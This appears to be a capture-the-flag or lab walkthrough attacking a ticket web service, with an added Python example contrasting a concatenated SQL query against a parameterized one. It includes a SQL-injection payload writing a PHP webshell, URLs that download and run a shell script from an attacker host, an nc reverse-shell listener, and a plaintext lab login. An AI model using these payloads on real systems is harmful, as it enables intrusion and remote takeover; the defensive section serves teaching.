17445
Seems to be a ticket service.
Registering a new user and logging in as issue_user : ManagementInsideOld797

Now checking the parameter in the code: it is vulnerable to SQL injection.
We can head to that URL:
Intercepting the request in Burp Suite, we can add the priority parameter:
We get a 400 Bad Request error.
But trying with a POST request: it's successful.
Now we can write the webshell to the path discovered from port [[30455]]
' union select '<?php system($_GET["cmd"]); ?>' into outfile '/srv/http/webshell.php' -- -
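The root cause behind the step above, as an added example that is not code from the original page or from the target application: a priority filter built by string concatenation beside its hardened form. The table, the function names, the allowed priority values and the use of SQLite as a stand-in database are all assumptions, and the injected string is a constructed input that keeps the union-select shape of the payload but writes no file.

```python
import sqlite3

# Constructed schema and rows; the real application's tables are not shown on the page.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE issues (id INTEGER PRIMARY KEY, title TEXT, priority TEXT);
        INSERT INTO issues (title, priority) VALUES
            ('Printer offline', 'Normal'), ('VPN down', 'High');
    """)
    return db

ALLOWED_PRIORITIES = {"Low", "Normal", "High"}  # assumed value set

def issues_vulnerable(db, priority):
    # 'Before' form: the request value is pasted into the SQL text, so a quote
    # in it ends the string literal and the rest is parsed as SQL.
    sql = "SELECT id, title, priority FROM issues WHERE priority = '" + priority + "'"
    return db.execute(sql).fetchall()

def issues_hardened(db, priority):
    # Reject anything outside the known set, then bind the value as data.
    if priority not in ALLOWED_PRIORITIES:
        raise ValueError("unknown priority")
    sql = "SELECT id, title, priority FROM issues WHERE priority = ?"
    return db.execute(sql, (priority,)).fetchall()

# Constructed input: a union select of literals, like the page's payload,
# but with no file write.
INJECTED = "' UNION SELECT 0, 'injected', 'row' -- -"

def demo():
    db = make_db()
    leaked = issues_vulnerable(db, INJECTED)   # attacker-chosen row comes back
    try:
        issues_hardened(db, INJECTED)
        blocked = False
    except ValueError:
        blocked = True
    # Binding alone (no allow-list) also keeps the input inert: it matches no row.
    bound = db.execute("SELECT id FROM issues WHERE priority = ?", (INJECTED,)).fetchall()
    return leaked, blocked, bound, issues_hardened(db, "High")

if __name__ == "__main__":
    print(demo())
```

On MySQL or MariaDB, the file write in the payload additionally requires the FILE privilege and a secure_file_priv setting that permits the target directory, so revoking FILE from the application account and restricting secure_file_priv removes that step even if an injection remains.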

Now navigating to http://192.168.155.147:30455/webshell.php?cmd=id
To get a reverse shell, start a Python server:
python3 -m http.server 30455
Setup a listener:
sudo rlwrap nc -nlvp 443
Then:
http://192.168.155.147:30455/shell.php?cmd=wget http://192.168.45.182/shell.sh
http://192.168.155.147:30455/shell.php?cmd=bash%20shell.sh
We get a shell: